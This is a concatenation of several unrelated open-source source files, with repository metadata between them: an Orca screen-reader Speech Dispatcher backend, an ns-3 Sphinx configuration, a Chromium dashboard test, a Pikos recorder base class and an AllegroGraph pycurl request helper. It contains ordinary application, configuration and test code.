self._client.set_punctuation(mode)
def _send_command(self, command, *args, **kwargs):
if hasattr(speechd, 'SSIPCommunicationError'):
try:
return command(*args, **kwargs)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
return command(*args, **kwargs)
except:
pass
else:
# It is not possible to catch the error with older SD versions.
return command(*args, **kwargs)
def _set_rate(self, acss_rate):
rate = int(2 * max(0, min(99, acss_rate)) - 98)
self._send_command(self._client.set_rate, rate)
def _set_pitch(self, acss_pitch):
pitch = int(20 * max(0, min(9, acss_pitch)) - 90)
self._send_command(self._client.set_pitch, pitch)
def _set_volume(self, acss_volume):
volume = int(15 * max(0, min(9, acss_volume)) - 35)
self._send_command(self._client.set_volume, volume)
def _set_family(self, acss_family):
familyLocale = acss_family.get(speechserver.VoiceFamily.LOCALE)
if not familyLocale:
import locale
familyLocale, encoding = locale.getdefaultlocale()
if familyLocale:
lang = familyLocale.split('_')[0]
if lang and len(lang) == 2:
self._send_command(self._client.set_language, str(lang))
try:
# This command is not available with older SD versions.
set_synthesis_voice = self._client.set_synthesis_voice
except AttributeError:
pass
else:
name = acss_family.get(speechserver.VoiceFamily.NAME)
if name != self._default_voice_name:
self._send_command(set_synthesis_voice, name)
def _debug_sd_values(self, prefix=""):
if debug.debugLevel > debug.LEVEL_INFO:
return
try:
sd_rate = self._send_command(self._client.get_rate)
sd_pitch = self._send_command(self._client.get_pitch)
except:
sd_rate = "(exception occurred)"
sd_pitch = "(exception occurred)"
current = self._current_voice_properties
msg = "SPEECH DISPATCHER: %sOrca rate %s, pitch %s; " \
"SD rate %s, pitch %s" % \
(prefix,
self._current_voice_properties.get(ACSS.RATE),
self._current_voice_properties.get(ACSS.AVERAGE_PITCH),
sd_rate,
sd_pitch)
debug.println(debug.LEVEL_INFO, msg, True)
def _apply_acss(self, acss):
if acss is None:
acss = settings.voices[settings.DEFAULT_VOICE]
current = self._current_voice_properties
for acss_property, method in self._acss_manipulators:
value = acss.get(acss_property)
if value is not None:
if current.get(acss_property) != value:
method(value)
current[acss_property] = value
elif acss_property == ACSS.AVERAGE_PITCH:
method(5.0)
current[acss_property] = 5.0
elif acss_property == ACSS.FAMILY \
and acss == settings.voices[settings.DEFAULT_VOICE]:
# We need to explicitly reset (at least) the family.
# See bgo#626072.
#
method({})
current[acss_property] = {}
def __addVerbalizedPunctuation(self, oldText):
"""Depending upon the users verbalized punctuation setting,
adjust punctuation symbols in the given text to their pronounced
equivalents. The pronounced text will either replace the
punctuation symbol or be inserted before it. In the latter case,
this is to retain spoken prosody.
Arguments:
- oldText: text to be parsed for punctuation.
Returns a text string with the punctuation symbols adjusted accordingly.
"""
spokenEllipsis = messages.SPOKEN_ELLIPSIS + " "
newText = re.sub(ELLIPSIS, spokenEllipsis, oldText)
symbols = set(re.findall(PUNCTUATION, newText))
for symbol in symbols:
try:
level, action = punctuation_settings.getPunctuationInfo(symbol)
except:
continue
if level != punctuation_settings.LEVEL_NONE:
# Speech Dispatcher should handle it.
#
continue
charName = " %s " % chnames.getCharacterName(symbol)
if action == punctuation_settings.PUNCTUATION_INSERT:
charName += symbol
newText = re.sub(symbol, charName, newText)
if orca_state.activeScript:
newText = orca_state.activeScript.utilities.adjustForDigits(newText)
return newText
def _speak(self, text, acss, **kwargs):
if isinstance(text, ACSS):
text = ''
text = self.__addVerbalizedPunctuation(text)
if orca_state.activeScript:
text = orca_state.activeScript.\
utilities.adjustForPronunciation(text)
# Replace no break space characters with plain spaces since some
# synthesizers cannot handle them. See bug #591734.
#
text = text.replace('\u00a0', ' ')
# Replace newline followed by full stop, since
# this seems to crash sd, see bgo#618334.
#
text = text.replace('\n.', '\n')
self._apply_acss(acss)
self._debug_sd_values("Speaking '%s' " % text)
self._send_command(self._client.speak, text, **kwargs)
def _say_all(self, iterator, orca_callback):
"""Process another sayAll chunk.
Called by the gidle thread.
"""
try:
context, acss = next(iterator)
except StopIteration:
pass
else:
def callback(callbackType, index_mark=None):
# This callback is called in Speech Dispatcher listener thread.
# No subsequent Speech Dispatcher interaction is allowed here,
# so we pass the calls to the gidle thread.
t = self._CALLBACK_TYPE_MAP[callbackType]
if t == speechserver.SayAllContext.PROGRESS:
if index_mark:
context.currentOffset = int(index_mark)
else:
context.currentOffset = context.startOffset
elif t == speechserver.SayAllContext.COMPLETED:
context.currentOffset = context.endOffset
GLib.idle_add(orca_callback, context, t)
if t == speechserver.SayAllContext.COMPLETED:
GLib.idle_add(self._say_all, iterator, orca_callback)
self._speak(context.utterance, acss, callback=callback,
event_types=list(self._CALLBACK_TYPE_MAP.keys()))
return False # to indicate, that we don't want to be called again.
def _cancel(self):
self._send_command(self._client.cancel)
def _change_default_speech_rate(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
rate = acss[ACSS.RATE]
except KeyError:
rate = 50
acss[ACSS.RATE] = max(0, min(99, rate + delta))
msg = 'SPEECH DISPATCHER: Rate set to %d' % rate
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SLOWER \
or messages.SPEECH_FASTER, acss=acss)
def _change_default_speech_pitch(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
pitch = acss[ACSS.AVERAGE_PITCH]
except KeyError:
pitch = 5
acss[ACSS.AVERAGE_PITCH] = max(0, min(9, pitch + delta))
msg = 'SPEECH DISPATCHER: Pitch set to %d' % pitch
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_LOWER \
or messages.SPEECH_HIGHER, acss=acss)
def _change_default_speech_volume(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
volume = acss[ACSS.GAIN]
except KeyError:
volume = 5
acss[ACSS.GAIN] = max(0, min(9, volume + delta))
msg = 'SPEECH DISPATCHER: Volume set to %d' % volume
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SOFTER \
or messages.SPEECH_LOUDER, acss=acss)
def getInfo(self):
return [self._SERVER_NAMES.get(self._id, self._id), self._id]
def getVoiceFamilies(self):
# Always offer the configured default voice with a language
# set according to the current locale.
from locale import getlocale, LC_MESSAGES
locale = getlocale(LC_MESSAGES)[0]
if locale is None or locale == 'C':
lang = None
dialect = None
else:
lang, dialect = locale.split('_')
voices = ((self._default_voice_name, lang, None),)
try:
# This command is not available with older SD versions.
list_synthesis_voices = self._client.list_synthesis_voices
except AttributeError:
pass
else:
try:
voices += self._send_command(list_synthesis_voices)
except:
pass
families = [speechserver.VoiceFamily({ \
speechserver.VoiceFamily.NAME: name,
#speechserver.VoiceFamily.GENDER: speechserver.VoiceFamily.MALE,
speechserver.VoiceFamily.DIALECT: dialect,
speechserver.VoiceFamily.LOCALE: lang})
for name, lang, dialect in voices]
return families
def speak(self, text=None, acss=None, interrupt=True):
#if interrupt:
# self._cancel()
# "We will not interrupt a key echo in progress." (Said the comment in
# speech.py where these next two lines used to live. But the code here
# suggests we haven't been doing anything with the lastKeyEchoTime in
# years. TODO - JD: Dig into this and if it's truly useless, kill it.)
if self._lastKeyEchoTime:
interrupt = interrupt and (time.time() - self._lastKeyEchoTime) > 0.5
if text:
self._speak(text, acss)
def speakUtterances(self, utteranceList, acss=None, interrupt=True):
#if interrupt:
# self._cancel()
for utterance in utteranceList:
if utterance:
self._speak(utterance, acss)
def sayAll(self, utteranceIterator, progressCallback):
GLib.idle_add(self._say_all, utteranceIterator, progressCallback)
def speakCharacter(self, character, acss=None):
self._apply_acss(acss)
if character == '\n':
self._send_command(self._client.sound_icon, 'end-of-line')
return
name = chnames.getCharacterName(character)
if not name:
self._send_command(self._client.char, character)
return
if orca_state.activeScript:
name = orca_state.activeScript.\
utilities.adjustForPronunciation(name)
self.speak(name, acss)
def speakKeyEvent(self, event):
if event.isPrintableKey() and event.event_string.isupper():
acss = settings.voices[settings.UPPERCASE_VOICE]
else:
acss = ACSS(settings.voices[settings.DEFAULT_VOICE])
event_string = event.getKeyName()
if orca_state.activeScript:
event_string = orca_state.activeScript.\
utilities.adjustForPronunciation(event_string)
lockingStateString = event.getLockingStateString()
event_string = "%s %s" % (event_string, lockingStateString)
self.speak(event_string, acss=acss)
self._lastKeyEchoTime = time.time()
def increaseSpeechRate(self, step=5):
self._change_default_speech_rate(step)
def decreaseSpeechRate(self, step=5):
self._change_default_speech_rate(step, decrease=True)
def increaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step)
def decreaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step, decrease=True)
def increaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step)
def decreaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step, decrease=True)
def stop(self):
self._cancel()
def shutdown(self):
self._client.close()
del SpeechServer._active_servers[self._id]
def reset(self, text=None, acss=None):
self._client.close()
self._init()
def list_output_modules(self):
"""Return names of available output modules as a tuple of strings.
This method is not a part of Orca speech API, but is used internally
by the Speech Dispatcher backend.
The returned tuple can be empty if the information can not be
obtained (e.g. with an older Speech Dispatcher version).
"""
try:
return self._send_command(self._client.list_output_modules)
except AttributeError:
return ()
except speechd.SSIPCommandError:
return ()
| lgpl-2.1 | 5,530,888,183,352,487,000 | 36.950276 | 81 | 0.609841 | false |
teto/ns-3-dev-git | doc/tutorial/source/conf.py | 1 | 7057 | # -*- coding: utf-8 -*-
#
# ns-3 documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 14 09:00:39 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.imgmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ns-3'
copyright = u'2010, ns-3 project'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'ns-3-dev'
# The full version, including alpha/beta/rc tags.
release = 'ns-3-dev'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'ns3_html_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['../..']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'Tutorial'
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y %H:%M'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ns-3doc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'ns-3-tutorial.tex', u'ns-3 Tutorial',
u'ns-3 project', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = '../../ns3_html_theme/static/ns-3.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
latex_preamble = '\usepackage{amssymb}'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ns-3-tutorial', u'ns-3 Tutorial',
[u'ns-3 project'], 1)
]
| gpl-2.0 | -883,867,585,173,012,000 | 31.671296 | 80 | 0.705399 | false |
benschmaus/catapult | dashboard/dashboard/benchmark_health_report_test.py | 2 | 5261 | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import unittest
import webapp2
import webtest
from google.appengine.ext import ndb
from dashboard import benchmark_health_report
from dashboard import update_test_suites
from dashboard.common import stored_object
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import anomaly
from dashboard.models import graph_data
class BenchmarkHealthReportTest(testing_common.TestCase):
def setUp(self):
super(BenchmarkHealthReportTest, self).setUp()
app = webapp2.WSGIApplication(
[('/benchmark_health_report',
benchmark_health_report.BenchmarkHealthReportHandler)])
self.testapp = webtest.TestApp(app)
def _AddAnomalyEntities(
self, revision_ranges, test_key, bug_id=None):
"""Adds a group of Anomaly entities to the datastore."""
urlsafe_keys = []
for start_rev, end_rev in revision_ranges:
anomaly_key = anomaly.Anomaly(
start_revision=start_rev, end_revision=end_rev,
test=test_key, bug_id=bug_id,
median_before_anomaly=100, median_after_anomaly=200).put()
urlsafe_keys.append(anomaly_key.urlsafe())
return urlsafe_keys
def _AddTests(self):
"""Adds sample TestMetadata entities and returns their keys."""
testing_common.AddTests(['ChromiumPerf'], ['linux'], {
'sunspider': {
'Total': {},
'ref': {},
},
'page_cycler': {
'load_time': {
'cnn.com': {},
'google.com': {},
}
}
})
tests = graph_data.TestMetadata.query()
for test in tests:
test.improvement_direction = anomaly.DOWN
ndb.put_multi(tests)
def _AddCachedSuites(self):
test_suites = {
'sunspider': {
'mas': {'ChromiumPerf': {'mac': False, 'linux': False}},
'mon': [],
},
'page_cycler': {
'mas': {'ChromiumPerf': {'linux': False}, 'CrOS': {'foo': False}},
'mon': ['load_time'],
},
'speedometer': {
'mas': {'CrOS': {'foo': False, 'bar': False}},
'mon': [],
}
}
key = update_test_suites._NamespaceKey(
update_test_suites._LIST_SUITES_CACHE_KEY)
stored_object.Set(key, test_suites)
def testGet(self):
response = self.testapp.get('/benchmark_health_report')
self.assertEqual('text/html', response.content_type)
self.assertIn('Chrome Performance Dashboard', response.body)
def testPost_MasterArgument_ListsTestsForMaster(self):
self._AddCachedSuites()
response = self.testapp.post(
'/benchmark_health_report', {'master': 'CrOS'})
benchmark_list = self.GetJsonValue(response, 'benchmarks')
self.assertItemsEqual(benchmark_list, [{
'name': 'page_cycler',
'monitored': True,
'bots': ['foo'],
}, {
'name': 'speedometer',
'monitored': False,
'bots': ['bar', 'foo'],
}])
def testPost_BenchmarkArgument_ListsAlertsAndBots(self):
self._AddCachedSuites()
self._AddTests()
self._AddAnomalyEntities(
[(200, 400), (600, 800)],
utils.TestKey('ChromiumPerf/linux/page_cycler/load_time'))
self._AddAnomalyEntities(
[(500, 700)],
utils.TestKey('ChromiumPerf/linux/page_cycler/load_time/cnn.com'))
response = self.testapp.post(
'/benchmark_health_report', {
'benchmark': 'page_cycler',
'num_days': '30',
'master': 'ChromiumPerf',
})
bots = self.GetJsonValue(response, 'bots')
self.assertItemsEqual(bots, ['linux'])
self.assertTrue(self.GetJsonValue(response, 'monitored'))
alerts = self.GetJsonValue(response, 'alerts')
self.assertEqual(3, len(alerts))
def testPost_Benchmark_NotMonitored(self):
self._AddCachedSuites()
self._AddTests()
response = self.testapp.post(
'/benchmark_health_report', {
'benchmark': 'sunspider',
'num_days': '30',
'master': 'ChromiumPerf',
})
self.assertFalse(self.GetJsonValue(response, 'monitored'))
def testPost_BenchmarkArgumentNumDaysArgument_ListsCorrectAlerts(self):
self._AddCachedSuites()
self._AddTests()
self._AddAnomalyEntities(
[(200, 400), (600, 800)],
utils.TestKey('ChromiumPerf/linux/page_cycler/load_time'))
self._AddAnomalyEntities(
[(500, 700)],
utils.TestKey('ChromiumPerf/linux/page_cycler/load_time/cnn.com'))
anomalies = anomaly.Anomaly.query().fetch()
anomalies[0].timestamp = datetime.datetime.now() - datetime.timedelta(
days=20)
anomalies[0].put()
response = self.testapp.post(
'/benchmark_health_report',
{'benchmark': 'page_cycler', 'num_days': '5', 'master': 'ChromiumPerf'})
bots = self.GetJsonValue(response, 'bots')
self.assertItemsEqual(bots, ['linux'])
self.assertTrue(self.GetJsonValue(response, 'monitored'))
alerts = self.GetJsonValue(response, 'alerts')
self.assertEqual(2, len(alerts))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 4,280,909,695,348,275,000 | 32.509554 | 80 | 0.624976 | false |
enthought/pikos | pikos/recorders/abstract_recorder.py | 1 | 1322 | # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# Package: Pikos toolkit
# File: recorders/abstract_recorder.py
# License: LICENSE.TXT
#
# Copyright (c) 2012, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
import abc
class RecorderError(Exception):
pass
class AbstractRecorder(object):
""" Abstract recorder class.
A recorder is reposnible for storing the record data that are provided by
the monitor or profiler. The records are expected to be nametuple-like
classes.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def prepare(self, record):
""" Perform any setup required before the recorder is used.
Parameters
----------
record : NamedTuple
The record class that is going to be used.
"""
@abc.abstractmethod
def finalize(self):
""" Perform any tasks to finalize and clean up when the recording
has completed.
"""
@abc.abstractmethod
def record(self, data):
""" Record a measurement.
Parameters
----------
data : NamedTuple
An instance of the record class that is going to be used.
"""
| bsd-3-clause | -9,214,632,131,664,054,000 | 23.036364 | 79 | 0.537821 | false |
mpetyx/pychatbot | SemanticWebApproach/RoboWriter/allegrordf-1.0.1/franz/miniclient/request.py | 1 | 6234 | import StringIO, pycurl, urllib, cjson, locale
from threading import Lock
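# A minimal thread-safe object pool; used below to reuse pycurl handles across requests.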
class Pool:
def __init__(self, create):
self.create = create
self.lock = Lock()
self.pool = []
def get(self):
self.lock.acquire()
try:
if len(self.pool): return self.pool.pop()
else: return self.create()
finally:
self.lock.release()
def put(self, value):
self.lock.acquire()
try:
self.pool.append(value)
finally:
self.lock.release()
curlPool = Pool(pycurl.Curl)
class RequestError(Exception):
def __init__(self, status, message):
print status, message
self.status = status
self.message = message
def __str__(self):
return "Server returned %s: %s" % (self.status, self.message)
def urlenc(**args):
buf = []
def enc(name, val):
buf.append(urllib.quote(name) + "=" + urllib.quote(val))
def encval(name, val):
if val is None: pass
elif isinstance(val, bool): enc(name, (val and "true") or "false")
elif isinstance(val, int): enc(name, "%d" % val)
elif isinstance(val, float): enc(name, "%g" % val)
elif isinstance(val, list) or isinstance(val, tuple):
for elt in val: encval(name, elt)
elif isinstance(val, basestring):
enc(name, val.encode("utf-8"))
else:
enc(name, unicode(val).encode("utf-8"))
for name, val in args.iteritems():
encval(name, val)
return "&".join(buf)
def makeRequest(obj, method, url, body=None, accept="*/*", contentType=None, callback=None, errCallback=None):
curl = curlPool.get()
if obj:
if obj.user and obj.password:
curl.setopt(pycurl.USERPWD, "%s:%s" % (obj.user, obj.password))
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)
if url.startswith("/"): url = obj.url + url
postbody = method == "POST" or method == "PUT"
curl.setopt(pycurl.POSTFIELDS, "")
if body:
if postbody:
curl.setopt(pycurl.POSTFIELDS, body)
else:
url = url + "?" + body
curl.setopt(pycurl.POST, (postbody and 1) or 0)
curl.setopt(pycurl.CUSTOMREQUEST, method)
curl.setopt(pycurl.URL, url)
# The "Expect:" is there to suppress "Expect: 100-continue"
# behaviour that is the default in libcurl when posting large
# bodies.
headers = ["Connection: keep-alive", "Accept: " + accept, "Expect:"]
if contentType and postbody: headers.append("Content-Type: " + contentType)
if callback: headers.append("Connection: close")
curl.setopt(pycurl.HTTPHEADER, headers)
curl.setopt(pycurl.ENCODING, "") # which means 'any encoding that curl supports'
if callback:
status = [None]
error = []
def headerfunc(string):
if status[0] is None:
status[0] = locale.atoi(string.split(" ")[1])
return len(string)
def writefunc(string):
if status[0] == 200: callback(string)
else: error.append(string.decode("utf-8"))
curl.setopt(pycurl.WRITEFUNCTION, writefunc)
curl.setopt(pycurl.HEADERFUNCTION, headerfunc)
curl.perform()
if status[0] != 200:
errCallback(curl.getinfo(pycurl.RESPONSE_CODE), "".join(error))
else:
buf = StringIO.StringIO()
curl.setopt(pycurl.WRITEFUNCTION, buf.write)
curl.perform()
response = buf.getvalue().decode("utf-8")
buf.close()
result = (curl.getinfo(pycurl.RESPONSE_CODE), response)
curlPool.put(curl)
return result
def jsonRequest(obj, method, url, body=None, contentType="application/x-www-form-urlencoded", rowreader=None, accept="application/json"):
if rowreader is None:
status, body = makeRequest(obj, method, url, body, accept, contentType)
if (status == 200):
if accept in ('application/json', 'text/integer', "application/x-quints+json"):
body = cjson.decode(body)
return body
else: raise RequestError(status, body)
else:
def raiseErr(status, message): raise RequestError(status, message)
makeRequest(obj, method, url, body, accept, contentType, callback=rowreader.process, errCallback=raiseErr)
def nullRequest(obj, method, url, body=None, contentType="application/x-www-form-urlencoded"):
status, body = makeRequest(obj, method, url, body, "application/json", contentType)
if (status < 200 or status > 204): raise RequestError(status, body)
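# Incremental parser for streamed JSON results: buffers partial chunks, decodes each complete
# top-level array, treats the first array as the column names when the stream is an object,
# and passes each subsequent row to callback(row, names).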
class RowReader:
def __init__(self, callback):
self.hasNames = None
self.names = None
self.skipNextBracket = False
self.callback = callback
self.backlog = None
def process(self, string):
if self.hasNames is None:
self.hasNames = string[0] == "{"
if not self.hasNames: self.skipNextBracket = True
ln = len(string)
if self.backlog: string = self.backlog + string
pos = [0]
def useArray(arr):
if self.hasNames:
if self.names:
self.callback(arr, self.names)
else:
self.names = arr
self.skipNextBracket = True
else:
self.callback(arr, None)
def takeArrayAt(start):
scanned = start + 1
while True:
end = string.find("]", scanned)
if end == -1: return False
try:
useArray(cjson.decode(string[start : end + 1].decode("utf-8")))
pos[0] = end + 1
return True
except cjson.DecodeError:
scanned = end + 1
while True:
start = string.find("[", pos[0])
if self.skipNextBracket:
self.skipNextBracket = False
pos[0] = start + 1
elif start == -1 or not takeArrayAt(start):
break
if pos[0] == 0:
self.backlog = string
return ln
else:
self.backlog = None
return pos[0]
| apache-2.0 | 4,239,466,818,039,334,400 | 34.622857 | 137 | 0.569458 | false |